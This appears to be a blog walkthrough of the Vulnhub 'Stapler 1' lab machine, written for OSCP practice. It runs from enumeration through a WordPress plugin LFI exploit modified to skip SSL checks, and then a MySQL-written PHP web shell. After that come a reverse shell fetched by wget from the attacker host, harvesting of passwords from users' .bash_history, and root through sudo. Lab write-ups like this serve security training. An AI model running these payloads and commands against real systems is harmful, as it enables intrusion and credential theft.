Stapler 1

Vulnhub virtual machine; another OSCP prep box. Which offered a wide scope of pentesting techniques to include Wordpress LFI with exploit modification to exclude SSL checking, MySQL RCE path that enabled the ability for a reverse shell and a custom find script that parsed .bash_history. Preparing for battle never felt so good.

---

Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.

---

Discover VM on network

1	netdiscover -r 192.168.56.0/24

Target: 192.168.56.108

Enumeration

Nmap Scan

1	nmap -sC -sV -oA nmap/stapler 192.168.56.108

output:

Try for some low hanging fruit

1 2	searchsploit vsftd 2.0.8 searchsploit vsftd

Enumerated 3.0.3 - no easy pathway

Continue enumerating with enum4linux for the smb shares

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 21 23:47:02 2019 ========================== | Target Information | ========================== Target ........... 192.168.56.108 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ====================================================== | Enumerating Workgroup/Domain on 192.168.56.108 | ====================================================== [+] Got domain/workgroup name: WORKGROUP ============================================== | Nbtstat Information for 192.168.56.108 | ============================================== Looking up status of 192.168.56.108 RED <00> - H <ACTIVE> Workstation Service RED <03> - H <ACTIVE> Messenger Service RED <20> - H <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> H <ACTIVE> Master Browser WORKGROUP <00> - <GROUP> H <ACTIVE> Domain/Workgroup Name WORKGROUP <1d> - H <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> H <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ======================================= | Session Check on 192.168.56.108 | ======================================= [+] Server 192.168.56.108 allows sessions using username '', password '' ============================================= | Getting domain SID for 192.168.56.108 | ============================================= Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ======================================== | OS information on 192.168.56.108 | ======================================== [+] Got OS info for 192.168.56.108 from smbclient: [+] Got OS info for 192.168.56.108 from srvinfo: RED Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu) platform_id : 500 os version : 6.1 server type : 0x809a03 =============================== | Users on 192.168.56.108 | =============================== =========================================== | Share Enumeration on 192.168.56.108 | =========================================== Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers kathy Disk Fred, What are we doing here? tmp Disk All temporary files should be stored here IPC$ IPC IPC Service (red server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP RED [+] Attempting to map shares on 192.168.56.108 //192.168.56.108/print$ Mapping: DENIED, Listing: N/A //192.168.56.108/kathy Mapping: OK, Listing: OK //192.168.56.108/tmp Mapping: OK, Listing: OK //192.168.56.108/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* ====================================================== | Password Policy Information for 192.168.56.108 | ====================================================== [+] Attaching to 192.168.56.108 using a NULL share [+] Trying protocol 445/SMB... [!] Protocol failed: [Errno Connection error (192.168.56.108:445)] timed out [+] Trying protocol 139/SMB... [+] Found domain(s): [+] RED [+] Builtin [+] Password Info for Domain: RED [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ================================ | Groups on 192.168.56.108 | ================================ [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ========================================================================= | Users on 192.168.56.108 via RID cycling (RIDS: 500-550,1000-1050) | ========================================================================= [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-864226560-67800430-3082388513 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-21-864226560-67800430-3082388513 and logon username '', password '' S-1-5-21-864226560-67800430-3082388513-500 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-501 RED\nobody (Local User) S-1-5-21-864226560-67800430-3082388513-502 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-503 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-504 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-505 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-506 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-507 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-508 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-509 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-510 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-511 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-512 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-513 RED\None (Domain Group) S-1-5-21-864226560-67800430-3082388513-514 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-515 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-516 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-517 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-518 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-519 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-520 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-521 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-522 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-523 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-524 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-525 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-526 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-527 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-528 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-529 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-530 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-531 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-532 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-533 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-534 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-535 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-536 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-537 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-538 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-539 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-540 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-541 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-542 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-543 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-544 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-545 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-546 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-547 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-548 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-549 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-550 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1000 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1001 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1002 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1003 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1004 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1005 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1006 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1007 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1008 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1009 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1010 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1011 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1012 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1013 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1014 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1015 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1016 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1017 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1018 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1019 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1020 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1021 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1022 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1023 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1024 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1025 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1026 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1027 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1028 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1029 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1030 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1031 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1032 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1033 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1034 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1035 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1036 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1037 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1038 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1039 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1040 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1041 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1042 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1043 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1044 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1045 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1046 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1047 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1048 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1049 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-500 *unknown*\*unknown* (8) S-1-5-32-501 *unknown*\*unknown* (8) S-1-5-32-502 *unknown*\*unknown* (8) S-1-5-32-503 *unknown*\*unknown* (8) S-1-5-32-504 *unknown*\*unknown* (8) S-1-5-32-505 *unknown*\*unknown* (8) S-1-5-32-506 *unknown*\*unknown* (8) S-1-5-32-507 *unknown*\*unknown* (8) S-1-5-32-508 *unknown*\*unknown* (8) S-1-5-32-509 *unknown*\*unknown* (8) S-1-5-32-510 *unknown*\*unknown* (8) S-1-5-32-511 *unknown*\*unknown* (8) S-1-5-32-512 *unknown*\*unknown* (8) S-1-5-32-513 *unknown*\*unknown* (8) S-1-5-32-514 *unknown*\*unknown* (8) S-1-5-32-515 *unknown*\*unknown* (8) S-1-5-32-516 *unknown*\*unknown* (8) S-1-5-32-517 *unknown*\*unknown* (8) S-1-5-32-518 *unknown*\*unknown* (8) S-1-5-32-519 *unknown*\*unknown* (8) S-1-5-32-520 *unknown*\*unknown* (8) S-1-5-32-521 *unknown*\*unknown* (8) S-1-5-32-522 *unknown*\*unknown* (8) S-1-5-32-523 *unknown*\*unknown* (8) S-1-5-32-524 *unknown*\*unknown* (8) S-1-5-32-525 *unknown*\*unknown* (8) S-1-5-32-526 *unknown*\*unknown* (8) S-1-5-32-527 *unknown*\*unknown* (8) S-1-5-32-528 *unknown*\*unknown* (8) S-1-5-32-529 *unknown*\*unknown* (8) S-1-5-32-530 *unknown*\*unknown* (8) S-1-5-32-531 *unknown*\*unknown* (8) S-1-5-32-532 *unknown*\*unknown* (8) S-1-5-32-533 *unknown*\*unknown* (8) S-1-5-32-534 *unknown*\*unknown* (8) S-1-5-32-535 *unknown*\*unknown* (8) S-1-5-32-536 *unknown*\*unknown* (8) S-1-5-32-537 *unknown*\*unknown* (8) S-1-5-32-538 *unknown*\*unknown* (8) S-1-5-32-539 *unknown*\*unknown* (8) S-1-5-32-540 *unknown*\*unknown* (8) S-1-5-32-541 *unknown*\*unknown* (8) S-1-5-32-542 *unknown*\*unknown* (8) S-1-5-32-543 *unknown*\*unknown* (8) S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) S-1-5-32-1000 *unknown*\*unknown* (8) S-1-5-32-1001 *unknown*\*unknown* (8) S-1-5-32-1002 *unknown*\*unknown* (8) S-1-5-32-1003 *unknown*\*unknown* (8) S-1-5-32-1004 *unknown*\*unknown* (8) S-1-5-32-1005 *unknown*\*unknown* (8) S-1-5-32-1006 *unknown*\*unknown* (8) S-1-5-32-1007 *unknown*\*unknown* (8) S-1-5-32-1008 *unknown*\*unknown* (8) S-1-5-32-1009 *unknown*\*unknown* (8) S-1-5-32-1010 *unknown*\*unknown* (8) S-1-5-32-1011 *unknown*\*unknown* (8) S-1-5-32-1012 *unknown*\*unknown* (8) S-1-5-32-1013 *unknown*\*unknown* (8) S-1-5-32-1014 *unknown*\*unknown* (8) S-1-5-32-1015 *unknown*\*unknown* (8) S-1-5-32-1016 *unknown*\*unknown* (8) S-1-5-32-1017 *unknown*\*unknown* (8) S-1-5-32-1018 *unknown*\*unknown* (8) S-1-5-32-1019 *unknown*\*unknown* (8) S-1-5-32-1020 *unknown*\*unknown* (8) S-1-5-32-1021 *unknown*\*unknown* (8) S-1-5-32-1022 *unknown*\*unknown* (8) S-1-5-32-1023 *unknown*\*unknown* (8) S-1-5-32-1024 *unknown*\*unknown* (8) S-1-5-32-1025 *unknown*\*unknown* (8) S-1-5-32-1026 *unknown*\*unknown* (8) S-1-5-32-1027 *unknown*\*unknown* (8) S-1-5-32-1028 *unknown*\*unknown* (8) S-1-5-32-1029 *unknown*\*unknown* (8) S-1-5-32-1030 *unknown*\*unknown* (8) S-1-5-32-1031 *unknown*\*unknown* (8) S-1-5-32-1032 *unknown*\*unknown* (8) S-1-5-32-1033 *unknown*\*unknown* (8) S-1-5-32-1034 *unknown*\*unknown* (8) S-1-5-32-1035 *unknown*\*unknown* (8) S-1-5-32-1036 *unknown*\*unknown* (8) S-1-5-32-1037 *unknown*\*unknown* (8) S-1-5-32-1038 *unknown*\*unknown* (8) S-1-5-32-1039 *unknown*\*unknown* (8) S-1-5-32-1040 *unknown*\*unknown* (8) S-1-5-32-1041 *unknown*\*unknown* (8) S-1-5-32-1042 *unknown*\*unknown* (8) S-1-5-32-1043 *unknown*\*unknown* (8) S-1-5-32-1044 *unknown*\*unknown* (8) S-1-5-32-1045 *unknown*\*unknown* (8) S-1-5-32-1046 *unknown*\*unknown* (8) S-1-5-32-1047 *unknown*\*unknown* (8) S-1-5-32-1048 *unknown*\*unknown* (8) S-1-5-32-1049 *unknown*\*unknown* (8) S-1-5-32-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\peter (Local User) S-1-22-1-1001 Unix User\RNunemaker (Local User) S-1-22-1-1002 Unix User\ETollefson (Local User) S-1-22-1-1003 Unix User\DSwanger (Local User) S-1-22-1-1004 Unix User\AParnell (Local User) S-1-22-1-1005 Unix User\SHayslett (Local User) S-1-22-1-1006 Unix User\MBassin (Local User) S-1-22-1-1007 Unix User\JBare (Local User) S-1-22-1-1008 Unix User\LSolum (Local User) S-1-22-1-1009 Unix User\IChadwick (Local User) S-1-22-1-1010 Unix User\MFrei (Local User) S-1-22-1-1011 Unix User\SStroud (Local User) S-1-22-1-1012 Unix User\CCeaser (Local User) S-1-22-1-1013 Unix User\JKanode (Local User) S-1-22-1-1014 Unix User\CJoo (Local User) S-1-22-1-1015 Unix User\Eeth (Local User) S-1-22-1-1016 Unix User\LSolum2 (Local User) S-1-22-1-1017 Unix User\JLipps (Local User) S-1-22-1-1018 Unix User\jamie (Local User) S-1-22-1-1019 Unix User\Sam (Local User) S-1-22-1-1020 Unix User\Drew (Local User) S-1-22-1-1021 Unix User\jess (Local User) S-1-22-1-1022 Unix User\SHAY (Local User) S-1-22-1-1023 Unix User\Taylor (Local User) S-1-22-1-1024 Unix User\mel (Local User) S-1-22-1-1025 Unix User\kai (Local User) S-1-22-1-1026 Unix User\zoe (Local User) S-1-22-1-1027 Unix User\NATHAN (Local User) S-1-22-1-1028 Unix User\www (Local User) S-1-22-1-1029 Unix User\elly (Local User) =============================================== | Getting printer info for 192.168.56.108 | =============================================== No printers returned. enum4linux complete on Thu Feb 21 23:48:26 2019

we have generated a list of local users:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

S-1-22-1-1000 Unix User\peter (Local User) S-1-22-1-1001 Unix User\RNunemaker (Local User) S-1-22-1-1002 Unix User\ETollefson (Local User) S-1-22-1-1003 Unix User\DSwanger (Local User) S-1-22-1-1004 Unix User\AParnell (Local User) S-1-22-1-1005 Unix User\SHayslett (Local User) S-1-22-1-1006 Unix User\MBassin (Local User) S-1-22-1-1007 Unix User\JBare (Local User) S-1-22-1-1008 Unix User\LSolum (Local User) S-1-22-1-1009 Unix User\IChadwick (Local User) S-1-22-1-1010 Unix User\MFrei (Local User) S-1-22-1-1011 Unix User\SStroud (Local User) S-1-22-1-1012 Unix User\CCeaser (Local User) S-1-22-1-1013 Unix User\JKanode (Local User) S-1-22-1-1014 Unix User\CJoo (Local User) S-1-22-1-1015 Unix User\Eeth (Local User) S-1-22-1-1016 Unix User\LSolum2 (Local User) S-1-22-1-1017 Unix User\JLipps (Local User) S-1-22-1-1018 Unix User\jamie (Local User) S-1-22-1-1019 Unix User\Sam (Local User) S-1-22-1-1020 Unix User\Drew (Local User) S-1-22-1-1021 Unix User\jess (Local User) S-1-22-1-1022 Unix User\SHAY (Local User) S-1-22-1-1023 Unix User\Taylor (Local User) S-1-22-1-1024 Unix User\mel (Local User) S-1-22-1-1025 Unix User\kai (Local User) S-1-22-1-1026 Unix User\zoe (Local User) S-1-22-1-1027 Unix User\NATHAN (Local User) S-1-22-1-1028 Unix User\www (Local User) S-1-22-1-1029 Unix User\elly (Local User)

Navigate to HTTP server

No root directory found

Connect to FTP - anonymous allowed

1	ftp 192.168.56.108

‘note’ discovered

1

get note

cat note

Elly is a confirmed user and now we have John

Navigating to HTTP server on port 12380

More might possibly be here based off multiple web servers.

Run Nikto

1	nikto -h https://192.168.56.108:12380

nikto identified */blogblog/* and */phpmyadmin/* worth investigating.

Navigate to /blogblog/

If we can break in to this web blog we could be able to find our way into the box.

wp-content

We discovered an uploads directory and the plugins. Normally plugins are an easy way to gain access.

Searchsploit Plugins

1	searchsploit advanced video

Exactly the avenue we want.

Download copy of exploit to directory

1	searchsploit -m exploits/php/webapps/39646.py

investigating the code for how it works and what is required to use the exploit.

1	POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

How we will need to craft our entry.

LFI

Modifying the exploit The exploit requires SSL to function properly but as we know this environment thats not going to happen. We need to bypass that ssl check and after some tinkering I found a solution.

before modification:

Adding

1 2 3 4 5 6

#adding the following the the exploit import os, ssl if (not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None)): ssl._create_default_https_context = ssl._create_unverified_context

After modification and running of application we now have a new blog post

New blog post from exploit:

file uploaded to *uploads* as expected.

Download file locally and take a look inside!

MySQL credentials have been captured.

1 2 3

MySQL user: root password: plbkac

Connecting to MySQL Server

1	mysql -u root -p -h 192.168.65.108

We are in!

Creating a Web-shell via MySQL (one-liner)

1	select "<?php passthru($_GET['cmd']); ?>" into outfile '/var/www/https/blogblog/wp-content/uploads/sh.php';

Bingo-bango lets see if we can execute commands on system.

RCE

Remote code execution via PHP web-sell.

1	https://$192.168.56.108:12380/blogblog/wp-content/uploads/sh.php?cmd=uname+-a

we can now execute commands on the box via this *sh.php?cmd=*

Reverse Shell Upload via SimpleHTTPServer

1	wget http://192.168.56.102:8000/shell.php

Successful reverse shell connection established. Now we need to upgrade this partial shell to a full shell.

Upgrade Partial Shell to full TTY

1 2 3 4

python -c 'import pty; pty.spawn("/bin/bash")' press cntl+z stty raw -echo fg (enter)

Upgraded!

Created a small script that parses through the entire home directory users for .bash_history

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79

find /home/ -maxdepth 2 -iname ".bash_history" -type f \; -exec sh -c "echo {} >> bh.txt && cat {} >> bh.txt" \; | cat bh.txt /home/MFrei/.bash_history exit /home/Sam/.bash_history exit /home/CCeaser/.bash_history free exit /home/DSwanger/.bash_history exit /home/JBare/.bash_history exit /home/mel/.bash_history exit /home/jess/.bash_history exit /home/MBassin/.bash_history exit /home/kai/.bash_history exit /home/elly/.bash_history exit /home/Drew/.bash_history exit /home/JLipps/.bash_history exit exit /home/jamie/.bash_history top ps aux exit /home/Taylor/.bash_history exit id /home/peter/.bash_history /home/SHayslett/.bash_history exit /home/JKanode/.bash_history id whoami ls -lah pwd ps aux sshpass -p thisimypassword ssh JKanode@localhost apt-get install sshpass sshpass -p JZQuyIN5 peter@localhost ps -ef top kill -9 3747 exit /home/AParnell/.bash_history exit /home/CJoo/.bash_history exit /home/Eeth/.bash_history exit /home/RNunemaker/.bash_history exit /home/SHAY/.bash_history exit /home/ETollefson/.bash_history exit /home/IChadwick/.bash_history exit /home/LSolum2/.bash_history exit whoami /home/SStroud/.bash_history exit /home/LSolum/.bash_history exit /home/NATHAN/.bash_history exit /home/zoe/.bash_history top exit

User JKanode is not good with secrets as we discovered an ssh login and password

1 2 3

sshpass -p thisimypassword ssh JKanode@localhost apt-get install sshpass sshpass -p JZQuyIN5 peter@localhost

Pivoting to different ssh user Login as Peter

1	ssh [email protected]

Test what peter is capable of

1

sudo -l

Peter happens to be able to do (ALL : ALL) ALL well this can be used to our benefit.

PRIV-ESC/ROOT

Lets have peter call /bin/sh with sudo

1	sudo /bin/sh

Bring me the root!

-exec